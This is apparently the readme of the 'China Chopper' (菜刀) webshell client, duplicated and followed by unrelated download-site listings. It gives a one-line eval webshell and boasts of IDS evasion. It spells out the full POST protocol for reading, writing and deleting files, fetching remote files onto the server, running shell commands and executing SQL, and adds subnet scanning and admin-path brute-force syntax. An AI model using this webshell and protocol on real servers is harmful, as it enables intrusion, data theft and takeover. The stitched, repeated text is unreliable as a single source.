在服务端运行的代码如下: PHP: ASP: ASP.NET: (注意:ASP.NET要单独一个文件或此文件也是Jscript语言) Customize: 自定义类型,功能代码在服务端保存,理论上支持所有动态脚本,只要正确与菜刀进行交互即可。
2)怎么用 在主视图中右键/添加,在弹出的对话框中输入服务端地址,连接的密码(请注意上例中的pass字串),选择正确的脚本类型和语言编码, 保存后即可使用文件管理,虚拟终端,数据库管理三大块功能,同时支持自定义的脚本执行,并可以导入导出数据。
要是其它都没错误,那么可能就是你把语言编码选错了。
1.文件管理:[特色]缓存下载目录,并支持离线查看缓存目录; 2.虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法) 3.数据库管理:[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS 以及支持ADO方式连接的数据库。
(各种脚本条件下的数据库连接方法请点击数据库管理界面左上角处的配置按钮查看) 注意:由于服务器的安全设置,某些功能可能不能正常使用。
3)关于配置信息怎么填? A)数据库方面: PHP脚本: 类型类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种 主机地址主机地址可为机器名或IP地址,如localhost 数据库用户连接数据库的用户名,如root 数据库密码连接数据库的密码,如123455 ASP和ASP.NET脚本: 类型类型只能填ADO ADO配置信息 ADO连接各种数据库的方式不一样。
如MSSQL的配置信息为 Driver={SqlServer};Server=(local);Database=master;Uid=sa;Pwd=123456; 同时,支持NT验证登录MSSQL数据库,并能把查询的结果列表导出为html文件 Customize脚本: 类型类型只能填XDB 与Customize脚本约定的配置信息 菜刀自带的server.jsp数据库参数填写方法如下(两行): MSSQL:com.microsoft.sqlserver.jdbc.SQLServerDriverjdbc:sqlserver://127.0.0.1:1433;databaseName=test;user=sa;password=123456 MYSQL:com.mysql.jdbc.Driverjdbc:mysql://localhost/test?user=root&password=123456 ORACLE:oracle.jdbc.driver.OracleDriverjdbc:oracle:thin:user/password@127.0.0.1:1521/test B)其它方面: 添加额外附加提交的数据,如ASP的新服务端是这样的: 那么,菜刀在配置处填入: SC=function+ff(Server,Response,Request,Application,Session,Error):eval(request("pass")):end+function 然后以密码pass来连接即可。
提交功能前先POST额外的数据包:会话期间只提交一次。
https://target.com/cgi-bin/login.cgi uid=user1&pwd=123456 3)关于HTTP登录验证 SHELL地址这样填http://user:pass@server/server.asp 用户名密码中的特殊字符可用URL编码转换。
二、安全扫描 蜘蛛爬行,绑定域名查询,目录爆破。
命令解释: A)查单一IP的绑定域名 {reverse_ip}{url:http://www.test.com/} B)扫描本C段开放的WEB服务器,并查询绑定域名 {reverse_ip_c}{url:http://www.test.com/} C)只扫描本C段开放的WEB服务器 {reverse_ip_c}{url:http://www.test.com/}{port} D)蜘蛛爬行 {spider}{url:http://www.test.com/} E)蜘蛛爬行,并设定爬行范围 {spider}{url:http://www.test.com/}{range:test.com} F)蜘蛛爬行,过滤重复URL加快速度 加上{filter} G)爆破功能,%s为dict中的一行 flag:后面为返回的数据(含HTTP头部)中的特定关键字 加!!为不包含关键字为TRUE,否则包含关键字为TRUE list.txt为当前目录下的文件,可设为绝对路径,注意:不要包含太多的行。
注:从20100626版开始,list.txt一定要是UNICODE格式的文本文件 {crack}{url:http://%s/admin/}{flag:HTTP/1.1200}{dict:list.txt} {crack}{url:http://%s/admin/}{flag:!!HTTP/1.1404}{dict:list.txt} {crack}{url:http://www.test.com/%s/}{flag:successfully}{dict:list.txt}三、定时提醒 当闹钟来用吧,周期:每月/每周/每日/只一次。
四、快速启动 一些常用的快捷方式放在这里,可以指定用户身份运行程序。
这部分数据是加密存储的。
五、浏览器 就是一个专用的网页浏览器:Post浏览/自定义Cookies,/执行自定义脚本/自动刷新页面/同IP网页搜索。
六、其它部分 等待加入。
文件说明:------------------------------------------------------------------chopper.exe 菜刀程序db.mdb 菜刀的主数据库------------------------------------------------------------------cache.tmp 菜刀的缓存数据库(可删除)readme.txt 你现在正在看的(可删除)[目录]Script 存放菜刀的自写脚本和Customize模式Jsp的一个服务端文件(可删除)----附---------------------------Customize模式菜刀和服务端通信接口---------------------------------------------------------------------------------------------------其它语言的服务端代码可按此接口来编写(请参照server.jsp/server.cfm)---------------------例:菜刀客户端填写的密码为pass,网页编码选的是GB2312注:所有参数都以POST提交,返回的数据都要以->|为开始标记,|<-为结束标记注:返回的错误信息开头包含ERROR://注:\t代表制表符TAB,\r\n代表换行回车,\n代表回车注:数据库配置信息是一个字符串,服务端脚本可以对此字符串格式进行自定义。
--------------------------------------------------------------------------------------------------------------------------------------------------------[得到当前目录的绝对路径]提交:pass=A&z0=GB2312返回:目录的绝对路径\t,如果是Windows系统后面接着加上驱动器列表示例:c:\inetpub\wwwroot\ C:D:E:K:示例:/var/www/html/ [目录浏览]提交:pass=B&z0=GB2312&z1=目录绝对路径返回:先目录后文件,目录名后要加/,文件名后不要加/示例: 目录名/\t时间\t大小\t属性\n目录名/\t时间\t大小\t属性\n 文件名\t时间\t大小\t属性\n文件名\t时间\t大小\t属性\n[读取文本文件]提交:pass=C&z0=GB2312&z1=文件绝对路径返回:文本文件的内容[写入文本文件]提交:pass=D&z0=GB2312&z1=文件绝对路径&z2=文件内容返回:成功返回1,不成功返回错误信息[删除文件或目录]提交:pass=E&z0=GB2312&z1=文件或目录的绝对路径返回:成功返回1,不成功返回错误信息[下载文件]提交:pass=F&z0=GB2312&z1=服务器文件的绝对路径返回:要下载文件的内容[上传文件]提交:pass=G&z0=GB2312&z1=文件上传后的绝对路径&z2=文件内容(十六进制文本格式)返回:要下载文件的内容[复制文件或目录后粘贴]提交:pass=H&z0=GB2312&z1=复制的绝对路径&z2=粘贴的绝对路径返回:成功返回1,不成功返回错误信息[文件或目录重命名]提交:pass=I&z0=GB2312&z1=原名(绝对路径)&z2=新名(绝对路径)返回:成功返回1,不成功返回错误信息[新建目录]提交:pass=J&z0=GB2312&z1=新目录名(绝对路径)返回:成功返回1,不成功返回错误信息[修改文件或目录时间]提交:pass=K&z0=GB2312&z1=文件或目录的绝对路径&z2=时间(格式:yyyy-MM-ddHH:mm:ss)返回:成功返回1,不成功返回错误信息[下载文件到服务器]提交:pass=L&z0=GB2312&z1=URL路径&z2=下载后保存的绝对路径返回:成功返回1,不成功返回错误信息[执行Shell命令(Shell路径前会根据服务器系统类型加上-c或/c参数)]提交:pass=M&z0=GB2312&z1=(-c或/c)加Shell路径&z2=Shell命令返回:命令执行结果[得到数据库基本信息]提交:pass=N&z0=GB2312&z1=数据库配置信息返回:成功返回数据库(以制表符\t分隔),不成功返回错误信息[获取数据库表名]提交:pass=O&z0=GB2312&z1=数据库配置信息\r\n数据库名返回:成功返回数据表(以\t分隔),不成功返回错误信息[获取数据表列名]提交:pass=P&z0=GB2312&z1=数据库配置信息\r\n数据库名\r\n数据表名返回:成功返回数据列(以制表符\t分隔),不成功返回错误信息[执行数据库命令]提交:pass=Q&z0=GB2312&z1=数据库配置信息\r\n数据库名&z2=SQL命令返回:成功返回数据表内容,不成功返回错误信息注意:返回的第一行为表头,接下去每行分别在列表中显示,列数要求一致。
行中的每列后加上\t|\t标记,每行以标记\r\n为结束
UINCODE方式编译,支持多国语言输入显示。
在非简体中文环境下使用,自动更换成英文界面,翻译有误的地方请留言指正。
一、脚本客户端(包括但不限于EVAL)部分 1)要了解的 服务端只需要简单的一行代码,即可用此程序实现常用的管理功能,功能代码二次编码后发送,过IDS的能力大幅提高。
目前支持的服务端脚本:PHP,ASP,ASP.NET,并且支持https安全连接的网站。
在服务端运行的代码如下: PHP: ASP: ASP.NET: (注意:ASP.NET要单独一个文件或此文件也是Jscript语言) Customize: 自定义类型,功能代码在服务端保存,理论上支持所有动态脚本,只要正确与菜刀进行交互即可。
2)怎么用 在主视图中右键/添加,在弹出的对话框中输入服务端地址,连接的密码(请注意上例中的pass字串),选择正确的脚本类型和语言编码, 保存后即可使用文件管理,虚拟终端,数据库管理三大块功能,同时支持自定义的脚本执行,并可以导入导出数据。
要是其它都没错误,那么可能就是你把语言编码选错了。
1.文件管理:[特色]缓存下载目录,并支持离线查看缓存目录; 2.虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法) 3.数据库管理:[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS 以及支持ADO方式连接的数据库。
(各种脚本条件下的数据库连接方法请点击数据库管理界面左上角处的配置按钮查看) 注意:由于服务器的安全设置,某些功能可能不能正常使用。
3)关于配置信息怎么填? A)数据库方面: PHP脚本: 类型类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种 主机地址主机地址可为机器名或IP地址,如localhost 数据库用户连接数据库的用户名,如root 数据库密码连接数据库的密码,如123455 ASP和ASP.NET脚本: 类型类型只能填ADO ADO配置信息 ADO连接各种数据库的方式不一样。
如MSSQL的配置信息为 Driver={SqlServer};Server=(local);Database=master;Uid=sa;Pwd=123456; 同时,支持NT验证登录MSSQL数据库,并能把查询的结果列表导出为html文件 Customize脚本: 类型类型只能填XDB 与Customize脚本约定的配置信息 菜刀自带的server.jsp数据库参数填写方法如下(两行): MSSQL:com.microsoft.sqlserver.jdbc.SQLServerDriverjdbc:sqlserver://127.0.0.1:1433;databaseName=test;user=sa;password=123456 MYSQL:com.mysql.jdbc.Driverjdbc:mysql://localhost/test?user=root&password=123456 ORACLE:oracle.jdbc.driver.OracleDriverjdbc:oracle:thin:user/password@127.0.0.1:1521/test B)其它方面: 添加额外附加提交的数据,如ASP的新服务端是这样的: 那么,菜刀在配置处填入: SC=function+ff(Server,Response,Request,Application,Session,Error):eval(request("pass")):end+function 然后以密码pass来连接即可。
提交功能前先POST额外的数据包:会话期间只提交一次。
https://target.com/cgi-bin/login.cgi uid=user1&pwd=123456 3)关于HTTP登录验证 SHELL地址这样填http://user:pass@server/server.asp 用户名密码中的特殊字符可用URL编码转换。
二、安全扫描 蜘蛛爬行,绑定域名查询,目录爆破。
命令解释: A)查单一IP的绑定域名 {reverse_ip}{url:http://www.test.com/} B)扫描本C段开放的WEB服务器,并查询绑定域名 {reverse_ip_c}{url:http://www.test.com/} C)只扫描本C段开放的WEB服务器 {reverse_ip_c}{url:http://www.test.com/}{port} D)蜘蛛爬行 {spider}{url:http://www.test.com/} E)蜘蛛爬行,并设定爬行范围 {spider}{url:http://www.test.com/}{range:test.com} F)蜘蛛爬行,过滤重复URL加快速度 加上{filter} G)爆破功能,%s为dict中的一行 flag:后面为返回的数据(含HTTP头部)中的特定关键字 加!!为不包含关键字为TRUE,否则包含关键字为TRUE list.txt为当前目录下的文件,可设为绝对路径,注意:不要包含太多的行。
注:从20100626版开始,list.txt一定要是UNICODE格式的文本文件 {crack}{url:http://%s/admin/}{flag:HTTP/1.1200}{dict:list.txt} {crack}{url:http://%s/admin/}{flag:!!HTTP/1.1404}{dict:list.txt} {crack}{url:http://www.test.com/%s/}{flag:successfully}{dict:list.txt}三、定时提醒 当闹钟来用吧,周期:每月/每周/每日/只一次。
四、快速启动 一些常用的快捷方式放在这里,可以指定用户身份运行程序。
这部分数据是加密存储的。
五、浏览器 就是一个专用的网页浏览器:Post浏览/自定义Cookies,/执行自定义脚本/自动刷新页面/同IP网页搜索。
六、其它部分 等待加入。
文件说明:------------------------------------------------------------------chopper.exe 菜刀程序db.mdb 菜刀的主数据库------------------------------------------------------------------cache.tmp 菜刀的缓存数据库(可删除)readme.txt 你现在正在看的(可删除)[目录]Script 存放菜刀的自写脚本和Customize模式Jsp的一个服务端文件(可删除)----附---------------------------Customize模式菜刀和服务端通信接口---------------------------------------------------------------------------------------------------其它语言的服务端代码可按此接口来编写(请参照server.jsp/server.cfm)---------------------例:菜刀客户端填写的密码为pass,网页编码选的是GB2312注:所有参数都以POST提交,返回的数据都要以->|为开始标记,|<-为结束标记注:返回的错误信息开头包含ERROR://注:\t代表制表符TAB,\r\n代表换行回车,\n代表回车注:数据库配置信息是一个字符串,服务端脚本可以对此字符串格式进行自定义。
--------------------------------------------------------------------------------------------------------------------------------------------------------[得到当前目录的绝对路径]提交:pass=A&z0=GB2312返回:目录的绝对路径\t,如果是Windows系统后面接着加上驱动器列表示例:c:\inetpub\wwwroot\ C:D:E:K:示例:/var/www/html/ [目录浏览]提交:pass=B&z0=GB2312&z1=目录绝对路径返回:先目录后文件,目录名后要加/,文件名后不要加/示例: 目录名/\t时间\t大小\t属性\n目录名/\t时间\t大小\t属性\n 文件名\t时间\t大小\t属性\n文件名\t时间\t大小\t属性\n[读取文本文件]提交:pass=C&z0=GB2312&z1=文件绝对路径返回:文本文件的内容[写入文本文件]提交:pass=D&z0=GB2312&z1=文件绝对路径&z2=文件内容返回:成功返回1,不成功返回错误信息[删除文件或目录]提交:pass=E&z0=GB2312&z1=文件或目录的绝对路径返回:成功返回1,不成功返回错误信息[下载文件]提交:pass=F&z0=GB2312&z1=服务器文件的绝对路径返回:要下载文件的内容[上传文件]提交:pass=G&z0=GB2312&z1=文件上传后的绝对路径&z2=文件内容(十六进制文本格式)返回:要下载文件的内容[复制文件或目录后粘贴]提交:pass=H&z0=GB2312&z1=复制的绝对路径&z2=粘贴的绝对路径返回:成功返回1,不成功返回错误信息[文件或目录重命名]提交:pass=I&z0=GB2312&z1=原名(绝对路径)&z2=新名(绝对路径)返回:成功返回1,不成功返回错误信息[新建目录]提交:pass=J&z0=GB2312&z1=新目录名(绝对路径)返回:成功返回1,不成功返回错误信息[修改文件或目录时间]提交:pass=K&z0=GB2312&z1=文件或目录的绝对路径&z2=时间(格式:yyyy-MM-ddHH:mm:ss)返回:成功返回1,不成功返回错误信息[下载文件到服务器]提交:pass=L&z0=GB2312&z1=URL路径&z2=下载后保存的绝对路径返回:成功返回1,不成功返回错误信息[执行Shell命令(Shell路径前会根据服务器系统类型加上-c或/c参数)]提交:pass=M&z0=GB2312&z1=(-c或/c)加Shell路径&z2=Shell命令返回:命令执行结果[得到数据库基本信息]提交:pass=N&z0=GB2312&z1=数据库配置信息返回:成功返回数据库(以制表符\t分隔),不成功返回错误信息[获取数据库表名]提交:pass=O&z0=GB2312&z1=数据库配置信息\r\n数据库名返回:成功返回数据表(以\t分隔),不成功返回错误信息[获取数据表列名]提交:pass=P&z0=GB2312&z1=数据库配置信息\r\n数据库名\r\n数据表名返回:成功返回数据列(以制表符\t分隔),不成功返回错误信息[执行数据库命令]提交:pass=Q&z0=GB2312&z1=数据库配置信息\r\n数据库名&z2=SQL命令返回:成功返回数据表内容,不成功返回错误信息注意:返回的第一行为表头,接下去每行分别在列表中显示,列数要求一致。
行中的每列后加上\t|\t标记,每行以标记\r\n为结束
2024/10/23 12:54:30
197KB
1
RBAC-SC:Role-basedaccesscontrolusingsmartcontract中文翻译
2024/9/20 15:27:18
760KB
1
在日常工作中,钉钉打卡成了我生活中不可或缺的一部分。然而,有时候这个看似简单的任务却给我带来了不少烦恼。
每天早晚,我总是得牢记打开钉钉应用,点击"工作台",再找到"考勤打卡"进行签到。有时候因为工作忙碌,会忘记打卡,导致考勤异常,影响当月的工作评价。而且,由于我使用的是苹果手机,有时候系统更新后,钉钉的某些功能会出现异常,使得打卡变得更加麻烦。
另外,我的家人使用的是安卓手机,他们也经常抱怨钉钉打卡的繁琐。尤其是对于那些不太熟悉手机操作的长辈来说,每次打卡都是一次挑战。他们总是担心自己会操作失误,导致打卡失败。
为了解决这些烦恼,我开始思考是否可以通过编写一个全自动化脚本来实现钉钉打卡。经过一段时间的摸索和学习,我终于成功编写出了一个适用于苹果和安卓系统的钉钉打卡脚本。
2024-04-09 15:03
15KB